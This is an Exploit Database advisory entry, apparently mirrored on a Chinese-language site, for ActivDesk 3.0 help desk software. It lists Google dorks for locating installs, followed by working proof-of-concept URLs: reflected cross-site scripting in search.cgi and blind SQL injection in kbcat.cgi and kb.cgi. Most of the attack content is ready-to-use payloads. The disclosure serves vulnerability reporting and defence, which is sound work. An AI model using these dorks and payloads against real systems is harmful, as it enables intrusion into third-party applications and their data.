ActivDesk 3.0 – Multiple Vulnerabilities

• Exploit Database
• 14 阅读

• 作者： Brendan Coles
  日期： 2011-06-23
• 类别：

  • webapps
  平台：

  • cgi
• 来源：https://www.exploit-db.com/exploits/17443/

• ActivDesk 3.0 multiple security vulnerabilities
  
  # Date: 2011-06-24
  # Author: Brendan Coles <bcoles@gmail.com>
  # Advisory: http://itsecuritysolutions.org/2011-06-24-ActivDesk-3.0-multiple-security-vulnerabilities/
  
  # Software: ActivDesk
  # Version: <= 3.0
  # Homepage: http://www.webhelpdesk-software.com/
  # Google Dorks:
  #inurl:kbcat.cgi ext:cgi
  #"Help Desk Powered By ActivDesk"
  
  # Vendor: FocalMedia
  # Homepage: http://www.focalmedia.net/
  # Notified: 2011-06-24 - Ticket# 67120010491
  
  
  # Cross-Site Scripting (XSS):
  
  http://localhost/[PATH]/search.cgi?keywords0=<script>alert(0)</script>
  http://localhost/[PATH]/search.cgi?keywords1=<script>alert(1)</script>
  http://localhost/[PATH]/search.cgi?keywords2=<script>alert(2)</script>
  http://localhost/[PATH]/search.cgi?keywords3=<script>alert(3)</script>
  
  
  # Blind SQL Injection:
  
  http://localhost/[PATH]/kbcat.cgi?cid=' or substring(@@version,1,1)=5 and ''='
  http://localhost/[PATH]/kb.cgi?kid=' or substring(@@version,1,1)=5 and ''='